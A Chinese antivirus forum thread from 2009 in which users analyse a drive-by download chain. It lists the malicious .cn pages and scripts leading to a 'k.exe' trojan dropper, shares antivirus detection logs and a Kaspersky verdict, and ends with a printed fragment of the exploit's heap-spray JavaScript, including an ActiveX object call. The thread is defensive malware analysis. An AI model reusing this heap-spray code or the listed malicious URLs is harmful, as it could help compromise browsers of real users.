查看: 2675|回复: 11
收起左侧

[其它] hxxp://www.jwhgqidff.cn/

[复制链接]
IllusionWing
发表于 2009-7-7 22:54:59 | 显示全部楼层 |阅读模式
源自该帖(LZ 估计被 arp了) http://bbs.kafan.cn/thread-514944-1-1.html

Astox Demo v1

开始自动解析 - http://www.jwhgqidff.cn/
L1 - http://www.iuwhdagf.cn/asdklfj2398/index.html
L2 - http://www.iuwhdagf.cn/asdklfj2398/ct14.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/ytfll.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/z.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/ctvod.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/ctxxz.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/ctqm.htm
L2 - http://www.iuwhdagf.cn/asdklfj2398/ct122121.htm
L3 - http://www.iuwhdagf.cn/asdklfj2398/14.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/15.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/16.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/logo.jpg
L3 - http://www.iuwhdagf.cn/asdklfj2398/ctvod.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/b.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/d.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/091.js
自动解析 - Auto XOR - http://www.dfrtgssf.cn/asdflj23298ak/k.exe
L3 - http://www.iuwhdagf.cn/asdklfj2398/092.js
L3 - http://www.dfrtgssf.cn/asdflj23298ak/k.exe#version=1,0,0,002
L3 - http://www.iuwhdagf.cn/asdklfj2398/Turl.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/real.js
L3 - http://www.iuwhdagf.cn/asdklfj2398/real1.js
关注 - http://www.dfrtgssf.cn/asdflj23298ak/k.exe
尤金卡巴斯基
发表于 2009-7-7 22:59:51 | 显示全部楼层
1.png

Hello,

New malicious software was found in the attached file. Its detection will be included in the next update.
Thank you for your help.
Trojan-Dropper.Win32.Mudrop.bdq

Regards, Tatarinov Ivan
Virus Analyst

10/1, 1st Volokolamsky Proezd, Moscow, 123060, Russia
Tel./Fax: + 7 (495) 797 8700
http://www.kaspersky.com http://www.viruslist.com

[ 本帖最后由 尤金卡巴斯基 于 2009-7-8 00:28 编辑 ]

k.rar

29.83 KB, 下载次数: 31

gtyre1
发表于 2009-7-7 23:12:34 | 显示全部楼层
[2009-07-07 23:11:54] 成功阻止360SE.exe访问http://www.iuwhdagf.cn/asdklfj2398/ct14.htm,此页面含有微软MS06014漏洞VB攻击恶意代码
[2009-07-07 23:11:55] 发现360SE.exe试图触发 heap spray漏洞,已被成功阻止!
bank-w3000
发表于 2009-7-7 23:20:09 | 显示全部楼层
红伞拒绝访问。
IllusionWing
 楼主| 发表于 2009-7-7 23:27:36 | 显示全部楼层
围观LS签名...
sam.to
发表于 2009-7-7 23:35:24 | 显示全部楼层

回复 5楼 gankeyu 的帖子

什么都沒有
IllusionWing
 楼主| 发表于 2009-7-7 23:42:44 | 显示全部楼层

回复 6楼 sam.to 的帖子

什么“什么都没有?”
xxl
发表于 2009-7-8 13:19:16 | 显示全部楼层
2009-7-8 13:18:15        http://bbs.kafan.cn/attachment.p ... d1&t=1247030275        Internet Explorer        处理错误: Trojan-Dropper.Win32.Mudrop.bdq        启发式分析计算的威胁级别值较高       
KIS8.0  kill
2009-7-8 13:18:15        http://bbs.kafan.cn/attachment.p ... 0275//k.exe//NSPack        Internet Explorer        拒绝: Trojan-Dropper.Win32.Mudrop.bdq        启发式分析计算的威胁级别值较高       
2009-7-8 13:18:15        http://bbs.kafan.cn/attachment.p ... 0275//k.exe//NSPack        Internet Explorer        检测到: Trojan-Dropper.Win32.Mudrop.bdq        启发式分析计算的威胁级别值较高
fzz8848
头像被屏蔽
发表于 2009-7-8 13:26:29 | 显示全部楼层

回复 6楼 sam.to 的帖子

什么都有,N多杀软和防火墙的图标
ryanking
发表于 2009-7-8 14:02:14 | 显示全部楼层

請教

從 hxxp://www.iuwhdagf.cn/asdklfj2398/go.jpg
捉到的代碼如下

var slackspace=headersize+ytshell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+ytshell;
var myObject=document.createElement('o'+'b'+'j'+'e'+'c'+'t');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
請問
var myObject=document.createElement('o'+'b'+'j'+'e'+'c'+'t');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
這段code 中的 myObject.data= ./logo.gif  
是讓0955AC62-BF2E-4CBA-A2B9-A63F772D46CF 去開啟 logo.gif嗎
但我用 Redoce 去捉  http://www.iuwhdagf.cn/asdklfj2398/logo.gif  都會   Failed
用8>Batch Downloading  下載回來的檔案是一個圖檔 但無法開啟
請問這個檔案是要做什麼用的
要用什麼工具去分析呢
感謝大家 謝謝

gankeyu: 请您下次禁止URL识别
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-1 11:16 , Processed in 0.132783 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表